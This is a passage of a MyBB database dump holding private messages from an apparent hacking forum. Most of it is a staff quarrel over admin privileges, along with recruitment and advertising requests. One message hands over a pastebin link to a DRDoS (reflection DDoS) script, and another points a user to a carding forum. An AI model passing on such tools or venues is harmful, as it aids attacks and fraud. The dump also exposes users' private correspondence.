never abused my privileges? When did I? I tool ipods GFX award off only because he is not a gfx pro. I deleted a spammers posts who was spamming CC shops and shit. I never abused it.... We are no longer friends?', '1350876415', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3719', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: A', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? \r\n[/quote]\r\n\r\nI did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread.\r\n[/quote]\r\nYou never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... \r\n[/quote]\r\n\r\nWhatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions?\r\n[/quote]\r\nThat is the thing I never abused my privileges? When did I? I tool ipods GFX award off only because he is not a gfx pro. I deleted a spammers posts who was spamming CC shops and shit. I never abused it.... We are no longer friends?\r\n[/quote]\r\n\r\nIf you are my friend then yes I\'m your friend.\r\n\r\nAbuse of power: http://l33thacking.net/misc.php?action=help&hid=12\r\n\r\nRead the first one.', '1350876526', '0', '3', '1350876645', '1', '0', '0', '1350876537'); INSERT INTO mybb_privatemessages VALUES('3721', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? \r\n[/quote]\r\n\r\nI did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread.\r\n[/quote]\r\nYou never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... \r\n[/quote]\r\n\r\nWhatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions?\r\n[/quote]\r\nThat is the thing I never abused my privileges? When did I? I tool ipods GFX award off only because he is not a gfx pro. I deleted a spammers posts who was spamming CC shops and shit. I never abused it.... We are no longer friends?\r\n[/quote]\r\n\r\nIf you are my friend then yes I\'m your friend.\r\n\r\nAbuse of power: http://l33thacking.net/misc.php?action=help&hid=12\r\n\r\nRead the first one.\r\n[/quote]\r\nI still consider you my best one. Just annoyed atm. And I had not read that now I know. And it would not have been a problem if I was admin again.:angel:', '1350876645', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3722', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: A', '0', '[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? \r\n[/quote]\r\n\r\nI did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread.\r\n[/quote]\r\nYou never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... \r\n[/quote]\r\n\r\nWhatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions?\r\n[/quote]\r\nThat is the thing I never abused my privileges? When did I? I tool ipods GFX award off only because he is not a gfx pro. I deleted a spammers posts who was spamming CC shops and shit. I never abused it.... We are no longer friends?\r\n[/quote]\r\n\r\nIf you are my friend then yes I\'m your friend.\r\n\r\nAbuse of power: http://l33thacking.net/misc.php?action=help&hid=12\r\n\r\nRead the first one.\r\n[/quote]\r\nI still consider you my best one. Just annoyed atm. And I had not read that now I know. And it would not have been a problem if I was admin again.:angel:\r\n[/quote]\r\n\r\nAs I said after your confirmation I need an active admin that can help me with the ACP related stuff.', '1350876701', '0', '3', '1350876767', '1', '0', '0', '1350876713'); INSERT INTO mybb_privatemessages VALUES('3724', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: A', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nhttp://l33thacking.net/misc.php?action=help&hid=12\r\n[/quote]\r\nDude I am in charge of awards... Not NHK... Also did you put the ex-co founder in my usertitle? How the fuck can I be a ex-co founder. You either were or weren\'t there is not used to be.... Like wth\r\n[/quote]\r\n\r\nYou are NOT THE FUCKING ONE WHO IS IN-CHARGE OF AWARDS! You neither are promised to become an admin again and NXK is NOT a TEMPORARY ADMIN.\r\n\r\nDo you get that or not?\r\n[/quote]\r\nI see how it is. Also I am still a co founder there is no possible to unbecome one. I did not think this would happen but I guess you never truly know someone on the internet. And worse you cannot trust your best internet ones either.:\'(\r\n[/quote]\r\n\r\nSpeaking of friendship and trust. I kept on requesting you to advertise LH on HF, did you? No. I told you to be active on LH, did you? No.\r\nWhy did you make a public post saying NXK is a temp admin? Why don\'t you come online when you can go on HF? Fine you are not posting on HF but you can still come online on LH.\r\n\r\nI sent you PMs to discuss things to do help improve LH, you either say IDK, reply when I have already taken a decision or you never get a chance to see it then you jump down my throat.\r\n\r\nI still kept you admin, I was told by others to make you a normal member but still I kept you staff because I was once your friend but seems like you didn\'t consider me one. I even added you an admin once I removed you because I trusted you.\r\n\r\n[/quote]\r\nIf I advertise LH I will get banned... I would do not want to get banned that is hardly fair. The last few weeks I have been very active and I post at least 2+ posts a day. You actually have not sent me pms to discuss anything. I never jumped down your throat I just asked you about it big difference.I am no longer your friend? No I did not consider you a friend I CONSIDERED YOU A BEST FRIEND. I never did anything to betray your trust when you added me back? \r\n[/quote]\r\n\r\nI did send you PMs but had to delete them time by time to have more space on the server. You did ask me why Reborn is mod again etc. You could have advertised and offered them free elite like me. I never got banned for offering free elite through PMs, I only got banned for posting a thread.\r\n[/quote]\r\nYou never told me about that. Also one bad person through pm reports me and I get fucked... The pm thing well I cannot read what is not there to read if you deleted them. And you never answered the last things I wrote... \r\n[/quote]\r\n\r\nWhatever the case might be. I don\'t want you to abuse your privileges or call anyone temp. What are your questions?\r\n[/quote]\r\nThat is the thing I never abused my privileges? When did I? I tool ipods GFX award off only because he is not a gfx pro. I deleted a spammers posts who was spamming CC shops and shit. I never abused it.... We are no longer friends?\r\n[/quote]\r\n\r\nIf you are my friend then yes I\'m your friend.\r\n\r\nAbuse of power: http://l33thacking.net/misc.php?action=help&hid=12\r\n\r\nRead the first one.\r\n[/quote]\r\nI still consider you my best one. Just annoyed atm. And I had not read that now I know. And it would not have been a problem if I was admin again.:angel:\r\n[/quote]\r\n\r\nAs I said after your confirmation I need an active admin that can help me with the ACP related stuff.\r\n[/quote]\r\nConfirmation. Right now as I finished my big project. ', '1350876767', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3726', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', '.', '0', 'You are my friend or not? It is not a tit for tat it is yes or no.\r\n\r\nPs. I fucked at least ten bitches today.', '1350877261', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3727', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Re: .', '0', '[quote=\'Apathy\']\r\nYou are my friend or not? It is not a tit for tat it is yes or no.\r\n\r\nPs. I fucked at least ten bitches today.\r\n[/quote]\r\n\r\nYes.', '1350877677', '0', '1', '0', '1', '0', '0', '1350879991'); INSERT INTO mybb_privatemessages VALUES('3735', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '1', 'Help Advertise LH', '0', 'Hi HoverCatz,\r\n\r\nWe are looking forward to people who are willing to help advertise LH. Don\'t worry, it\'s not going to take up much of your time. It would take hardly 10 minutes or else a day. This is completely voluntary, if you are interested then answer the following questions and post them [url=http://l33thacking.net/thread-1051.html]here[/url]\r\n\r\n[quote]\r\n1. Do you have any spare email?\r\n2. Do you know any hacker blogs?\r\n3. Can you help advertise on twitter?\r\n4. What search engine do you use?\r\n5. Do you upload videos on youtube?\r\n6. Are you registered on any active site that\'s not related to hacking?\r\n7. Are you registered on hackforums or ubers?\r\n8. If we provide you with programs and ebooks, can you share them on other sites?\r\n[/quote]\r\n\r\nThanks for reading', '1350880814', '0', '1', '0', '1', '0', '0', '1351201526'); INSERT INTO mybb_privatemessages VALUES('3789', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nI was wondering when my LH Group is officel, i changed the userbar already. i cant\'t wait cuz i have many good tutorials for my group :P\r\n\r\n\r\n[/quote]\r\nForgot about it. LH was down then had to manage a major scam report so got too busy. ', '1351132497', '0', '1', '0', '1', '0', '0', '1351151115'); INSERT INTO mybb_privatemessages VALUES('3738', '199', '199', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"199\";}}', '1', 'Help Advertise LH', '0', 'Hi Anonymous™,\r\n\r\nWe are looking forward to people who are willing to help advertise LH. Don\'t worry, it\'s not going to take up much of your time. It would take hardly 10 minutes or else a day. This is completely voluntary, if you are interested then answer the following questions and post them [url=http://l33thacking.net/thread-1051.html]here[/url]\r\n\r\n[quote]\r\n1. Do you have any spare email?\r\n2. Do you know any hacker blogs?\r\n3. Can you help advertise on twitter?\r\n4. What search engine do you use?\r\n5. Do you upload videos on youtube?\r\n6. Are you registered on any active site that\'s not related to hacking?\r\n7. Are you registered on hackforums or ubers?\r\n8. If we provide you with programs and ebooks, can you share them on other sites?\r\n[/quote]\r\n\r\nThanks for reading', '1350880814', '0', '1', '0', '1', '0', '0', '1351023309'); INSERT INTO mybb_privatemessages VALUES('3779', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hello', '0', 'I was wondering when my LH Group is officel, i changed the userbar already. i cant\'t wait cuz i have many good tutorials for my group :P\r\n\r\n', '1351094401', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3780', '228', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Gamers Recruitment ', '0', 'You have been accepted, Please give me some time to gather more members.', '1351105179', '0', '1', '0', '1', '0', '2', '1351105485'); INSERT INTO mybb_privatemessages VALUES('3781', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Gamers Recruitment ', '0', 'You have been accepted, Please give me some time to gather more members.', '1351105179', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3782', '2', '2', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Hello', '0', 'I don\'t know if you can but can you make my group marketers officel in LH?', '1351112733', '0', '3', '1351114981', '1', '0', '2', '1351114932'); INSERT INTO mybb_privatemessages VALUES('3783', '228', '2', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Hello', '0', 'I don\'t know if you can but can you make my group marketers officel in LH?', '1351112733', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3784', '228', '228', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nI don\'t know if you can but can you make my group marketers officel in LH?\r\n[/quote]\r\nI am not sure. I would try but I am on prob atm so I do not want anything with joker even if we are good friends. ', '1351114981', '0', '1', '0', '0', '0', '2', '1351151124'); INSERT INTO mybb_privatemessages VALUES('3785', '2', '228', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nI don\'t know if you can but can you make my group marketers officel in LH?\r\n[/quote]\r\nI am not sure. I would try but I am on prob atm so I do not want anything with joker even if we are good friends. ', '1351114981', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3788', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Leech report', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nSome guy who is now banned on LH has leeched some of our sites content. I reported some and got them removed by you are the original poster and you are also a member on the site it was leaked on, so file a report and get the content removed. Links to the leeched content\r\n\r\nhttp://www.leakforums.org/showthread.php?tid=30583\r\n\r\nhttp://www.leakforums.org/showthread.php?tid=28802\r\n\r\n\r\n\r\n\r\n[/quote]\r\n\r\nhe even used my images, did you ban him?\r\n[/quote]\r\n\r\nYup but just file a report on LF to get the content taken down.', '1351132421', '0', '1', '0', '1', '0', '0', '1351154605'); INSERT INTO mybb_privatemessages VALUES('3760', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Re: Hello', '0', '[quote=\'NXK\']\r\n[quote=\'VirtualLegend\']\r\nWhen is my group Marketers officel on LH?\r\n[/quote]\r\n\r\nWhen you find a different userbar. Contact reloadzor he may be interested in making you one.\r\n[/quote]\r\n\r\nI have already updated my userbar Check it out', '1350940563', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3761', '228', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'NXK\']\r\n[quote=\'VirtualLegend\']\r\nWhen is my group Marketers officel on LH?\r\n[/quote]\r\n\r\nWhen you find a different userbar. Contact reloadzor he may be interested in making you one.\r\n[/quote]\r\n\r\nI have already updated my userbar Check it out\r\n[/quote]\r\n\r\nIll Do it now.', '1350940619', '0', '1', '0', '1', '0', '2', '1350940653'); INSERT INTO mybb_privatemessages VALUES('3762', '61', '228', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'NXK\']\r\n[quote=\'VirtualLegend\']\r\nWhen is my group Marketers officel on LH?\r\n[/quote]\r\n\r\nWhen you find a different userbar. Contact reloadzor he may be interested in making you one.\r\n[/quote]\r\n\r\nI have already updated my userbar Check it out\r\n[/quote]\r\n\r\nIll Do it now.', '1350940619', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3751', '100', '100', '284', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'drdos script', '0', 'Hi, can you share your script with me?\r\n\r\nThank You.\r\n', '1350911437', '0', '3', '1350921831', '0', '0', '2', '1350921788'); INSERT INTO mybb_privatemessages VALUES('3752', '284', '100', '284', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'drdos script', '0', 'Hi, can you share your script with me?\r\n\r\nThank You.\r\n', '1350911437', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3753', '284', '284', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"284\";}}', '1', 'Re: drdos script', '0', '[quote=\'h3rcul3s\']\r\nHi, can you share your script with me?\r\n\r\nThank You.\r\n\r\n[/quote]\r\n\r\nEnjoy- \r\n\r\nhttp://pastebin.com/EgnhCsGm', '1350921831', '0', '0', '0', '1', '0', '1', '0'); INSERT INTO mybb_privatemessages VALUES('3754', '100', '284', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"284\";}}', '2', 'Re: drdos script', '0', '[quote=\'h3rcul3s\']\r\nHi, can you share your script with me?\r\n\r\nThank You.\r\n\r\n[/quote]\r\n\r\nEnjoy- \r\n\r\nhttp://pastebin.com/EgnhCsGm', '1350921831', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3790', '62', '62', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'hi', '0', 'hi frnd \r\ncan u tell me some forums name where i post premium acount with adf.ly or adfoc.us link.\r\n\r\nplease tell me if u know about such forum.', '1351152357', '0', '3', '1351154688', '0', '0', '2', '1351154624'); INSERT INTO mybb_privatemessages VALUES('3791', '255', '62', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'hi', '0', 'hi frnd \r\ncan u tell me some forums name where i post premium acount with adf.ly or adfoc.us link.\r\n\r\nplease tell me if u know about such forum.', '1351152357', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3792', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'hey', '0', 'hey man could you please open a new thread on the unique recruitment, because i would love to join this group :P', '1351153094', '0', '1', '0', '1', '0', '2', '1351197287'); INSERT INTO mybb_privatemessages VALUES('3793', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'hey', '0', 'hey man could you please open a new thread on the unique recruitment, because i would love to join this group :P', '1351153094', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3794', '255', '255', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"255\";}}', '1', 'Re: hi', '0', '[quote=\'sbhshroy2\']\r\nhi frnd \r\ncan u tell me some forums name where i post premium acount with adf.ly or adfoc.us link.\r\n\r\nplease tell me if u know about such forum.\r\n[/quote]\r\n\r\nABH - http://alboraaq.com/\r\n\r\n\r\nwill get you alot of clicks, but it\'s kinda a blackhat/carding forum', '1351154688', '0', '3', '1351170636', '1', '0', '2', '1351170493'); INSERT INTO mybb_privatemessages VALUES('3795', '62', '255', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"255\";}}', '2', 'Re: hi', '0', '[quote=\'sbhshroy2\']\r\nhi frnd \r\ncan u tell me some forums name where i post premium acount with adf.ly or adfoc.us link.\r\n\r\nplease tell me if u know about such forum.\r\n[/quote]\r\n\r\nABH - http://alboraaq.com/\r\n\r\n\r\nwill get you alot of clicks, but it\'s kinda a blackhat/carding forum', '1351154688', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3797', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: treyz123456789 ', '0', 'Hey mate,\r\n\r\ntreyz123456789 PM\'d me on UB, saying that his IP Is banned (just like what happened to me), and asked me to message you. He can\'t access LH\r\n\r\nI\'ll leave In your capable hands :)', '1351165518', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3798', '205', '205', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '1', 'Hello', '0', 'Do you want to join my group? Check it out ', '1351165591', '0', '3', '1351168044', '1', '0', '2', '1351167532'); INSERT INTO mybb_privatemessages VALUES('3799', '228', '205', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'Hello', '0', 'Do you want to join my group? Check it out ', '1351165591', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3800', '62', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Hello', '0', 'You want to join my group', '1351166274', '0', '3', '1351166785', '1', '0', '2', '1351166766'); INSERT INTO mybb_privatemessages VALUES('3801', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Hello', '0', 'You want to join my group', '1351166274', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3802', '228', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nYou want to join my group\r\n[/quote]\r\n\r\nI\'d love to bro.', '1351166785', '0', '3', '1351167273', '1', '0', '2', '1351167196'); INSERT INTO mybb_privatemessages VALUES('3803', '62', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nYou want to join my group\r\n[/quote]\r\n\r\nI\'d love to bro.', '1351166785', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3804', '62', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Hello', '0', '[quote=\'R?????zo?\']\r\n[quote=\'VirtualLegend\']\r\nYou want to join my group\r\n[/quote]\r\n\r\nI\'d love to bro.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-1094-post-6348.html#pid6348\r\nTo Apply, I will then accept you bro', '1351167273', '0', '3', '1351169021', '1', '0', '2', '1351168689'); INSERT INTO mybb_privatemessages VALUES('3805', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Hello', '0', '[quote=\'R?????zo?\']\r\n[quote=\'VirtualLegend\']\r\nYou want to join my group\r\n[/quote]\r\n\r\nI\'d love to bro.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-1094-post-6348.html#pid6348\r\nTo Apply, I will then accept you bro', '1351167273', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3806', '228', '228', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nDo you want to join my group? Check it out \r\n[/quote]\r\n\r\nHey mate,\r\n\r\nI shall check It out In detail shortly :)', '1351168044', '0', '1', '0', '1', '0', '2', '1351169141'); INSERT INTO mybb_privatemessages VALUES('3807', '205', '228', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\nDo you want to join my group? Check it out \r\n[/quote]\r\n\r\nHey mate,\r\n\r\nI shall check It out In detail shortly :)', '1351168044', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3808', '228', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'VirtualLegend\']\r\nYou want to join my group\r\n[/quote]\r\n\r\nI\'d love to bro.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-1094-post-6348.html#pid6348\r\nTo Apply, I will then accept you bro\r\n[/quote]\r\n\r\napplied, hope its good enough :3', '1351169021', '0', '3', '1351169297', '1', '0', '2', '1351169128'); INSERT INTO mybb_privatemessages VALUES('3809', '62', '228', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Hello', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'VirtualLegend\']\r\nYou want to join my group\r\n[/quote]\r\n\r\nI\'d love to bro.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-1094-post-6348.html#pid6348\r\nTo Apply, I will then accept you bro\r\n[/quote]\r\n\r\napplied, hope its good enough :3', '1351169021', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3810', '62', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Hello', '0', '[quote=\'R?????zo?\']\r\n[quote=\'VirtualLegend\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'VirtualLegend\']\r\nYou want to join my group\r\n[/quote]\r\n\r\nI\'d love to bro.\r\n[/quote]\r\n\r\nhttp://l33thacking.net/thread-1094-post-6348.html#pid6348\r\nTo Apply, I will then accept you bro\r\n[/quote]\r\n\r\napplied, hope its good enough :3\r\n[/quote]\r\n\r\nWelcome to the group buddy', '1351169297', '0', '1', '0', '1', '0', '2', '1351170532'); INSERT INTO mybb_privatemessages VALUES('3811', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Hello', '0', 